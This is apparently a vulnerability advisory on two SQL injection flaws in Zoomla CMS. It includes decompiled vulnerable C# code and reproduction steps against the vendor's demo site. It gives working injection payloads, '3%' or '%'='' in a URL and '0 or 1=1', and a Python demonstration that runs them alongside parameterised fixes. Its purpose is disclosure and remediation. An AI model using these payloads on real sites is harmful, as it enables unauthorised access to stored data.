Zoomla CMS: two ordinary SQL injection points - vulnerability warning - the black bar safety net

2014-01-04T00:00:00
ID MYHACK58:62201441659
Type myhack58
Reporter Anonymous
Modified 2014-01-04T00:00:00

Description

It seems Zoomla has started going completely closed-source, and is already preparing to stop everyone from decompiling. For now I don't know what method they use; if I work it out I will write it up. So officially, stop pushing the "XXX source package" line: not being open source is nothing to be ashamed of, but cheating customers is not very good.

Affected classes:

public class MIS_Target_planList : Page, IRequiresSessionState

public class MIS_Target_ProList : Page, IRequiresSessionState

Injection point 1:

public class MIS_Target_planList : Page, IRequiresSessionState
{
    // (fields and other members omitted)
    protected void Page_Load(object sender, EventArgs e)
    {
        this.buser.CheckIsLogin(); // a logged-in session is required, so this is a post-authentication injection
        if (!base.IsPostBack && !string.IsNullOrEmpty(base.Request["id"]))
        {
            this.id = DataConverter.CLng(base.Request["id"]); // first use of id: converted to a number, the "filtered" copy
            this.dt = this.bll.Sel("MID =" + base.Request["id"], "ID desc"); // second use: the raw request value is concatenated straight into the WHERE clause; this.id is never used
            if (this.dt != null && this.dt.Rows.Count > 0)
            {
                this.Repeater3.DataSource = this.dt;
                this.Repeater3.DataBind();
            }
        }
    }
}

The front end lets anyone register a user.

http://demo.zoomla.cn/Mis/Plan/AddPlan.aspx

Add a plan.

Visit http://demo.zoomla.cn/mis/target/planList.aspx?id=0

The plans are listed. That URL is the one to hand to the injection tool, together with the logged-in session cookies, since CheckIsLogin() rejects anonymous requests.

Injection point 2:

public class MIS_Target_ProList : Page, IRequiresSessionState
{
    protected global_asax ApplicationInstance
    {
        get
        {
            return (global_asax)this.Context.ApplicationInstance;
        }
    }

    // (fields and other members omitted)
    protected void Page_Load(object sender, EventArgs e)
    {
        this.buser.CheckIsLogin();
        // the vulnerable branch is only reached when types=7 is also supplied
        if (!base.IsPostBack && !string.IsNullOrEmpty(base.Request["types"]) && base.Request["types"].ToString() == "7" && !string.IsNullOrEmpty(base.Request["id"]))
        {
            this.id = DataConverter.CLng(base.Request["id"]); // converted copy, again unused
            this.dt = this.bll.Sel("TargetID like '%" + base.Request["id"] + "%' And IsSystem=0 ", "ID desc"); // the raw id is placed inside a LIKE pattern; a single quote in it closes the string literal
            if (this.dt != null && this.dt.Rows.Count > 0)
            {
                this.Repeater3.DataSource = this.dt;
                this.Repeater3.DataBind();
            }
        }
    }
}

Register a user at the front end and log in.

http://demo.zoomla.cn/Mis/Project/Default.aspx

Click "new project" and create any project.

Open http://demo.zoomla.cn/mis/target/prolist.aspx?types=7&id=3

The page is blank.

Open http://demo.zoomla.cn/mis/target/prolist.aspx?types=7&id=3%' or '%'='

After concatenation the WHERE clause reads TargetID like '%3%' or '%'='%' And IsSystem=0; the OR tautology matches every project with IsSystem=0 regardless of its TargetID, so all of the project information is listed.
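To make both code paths concrete, here is an added example (not code from this page or from Zoomla) that rebuilds the two queries against an in-memory SQLite database, runs the page's LIKE payload and an illustrative tautology for the numeric point, and shows the hardened form that uses the value DataConverter.CLng already produced as a bound parameter. The table names Plan and Target, the Name column, the sample rows, and the clng stand-in (integer parse, 0 on failure) are assumptions; Zoomla itself runs on SQL Server, but SQLite is enough to show the string and LIKE semantics these payloads rely on.

```python
import sqlite3

# Constructed sample rows standing in for the Zoomla MIS tables. The column
# names ID, MID, TargetID and IsSystem come from the decompiled queries; the
# table names, the Name column and the row values are assumptions.
PLANS = [(1, 10, "plan A"), (2, 10, "plan B"), (3, 11, "plan C")]
TARGETS = [
    (1, "5", 0, "project 1"),
    (2, "7", 0, "project 2"),
    (3, "7", 1, "system project"),
]


def make_db():
    """Build an in-memory SQLite database holding the constructed rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Plan (ID INTEGER, MID INTEGER, Name TEXT)")
    con.executemany("INSERT INTO Plan VALUES (?, ?, ?)", PLANS)
    con.execute("CREATE TABLE Target (ID INTEGER, TargetID TEXT, IsSystem INTEGER, Name TEXT)")
    con.executemany("INSERT INTO Target VALUES (?, ?, ?, ?)", TARGETS)
    return con


def clng(value):
    """Stand-in for DataConverter.CLng: parse an integer, 0 on failure (assumed behaviour)."""
    try:
        return int(value)
    except ValueError:
        return 0


# --- vulnerable pattern, mirroring the decompiled Page_Load methods ---

def plan_list_vulnerable(con, request_id):
    # injection point 1: the converted value is computed, then the raw string is concatenated
    _unused = clng(request_id)
    sql = "SELECT * FROM Plan WHERE MID =" + request_id + " ORDER BY ID desc"
    return con.execute(sql).fetchall()


def pro_list_vulnerable(con, request_id):
    # injection point 2: the raw string lands inside a LIKE literal, so a quote closes it
    _unused = clng(request_id)
    sql = ("SELECT * FROM Target WHERE TargetID like '%" + request_id
           + "%' And IsSystem=0  ORDER BY ID desc")
    return con.execute(sql).fetchall()


# --- hardened pattern: use the validated integer and bind it as a parameter ---

def plan_list_safe(con, request_id):
    mid = clng(request_id)
    return con.execute("SELECT * FROM Plan WHERE MID = ? ORDER BY ID desc", (mid,)).fetchall()


def pro_list_safe(con, request_id):
    target = clng(request_id)
    # the wildcards are added server side; the user-controlled part is only ever an integer
    pattern = "%" + str(target) + "%"
    return con.execute(
        "SELECT * FROM Target WHERE TargetID like ? AND IsSystem=0 ORDER BY ID desc",
        (pattern,),
    ).fetchall()


if __name__ == "__main__":
    con = make_db()
    print(plan_list_vulnerable(con, "10"))           # the intended lookup
    print(plan_list_vulnerable(con, "0 or 1=1"))     # illustrative tautology: every plan
    print(plan_list_safe(con, "0 or 1=1"))           # clng turns the payload into 0: nothing
    print(pro_list_vulnerable(con, "3"))             # the page's first request: blank
    print(pro_list_vulnerable(con, "3%' or '%'='"))  # the page's payload: every non-system project
    print(pro_list_safe(con, "3%' or '%'='"))        # bound parameter: blank again
```

The fix is the one the code was already half-way to: the page converts id with CLng and then throws the result away. Passing this.id into a parameterised query (or, for the LIKE case, building the pattern from the integer and binding it) removes both injection points without changing what a legitimate request returns.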
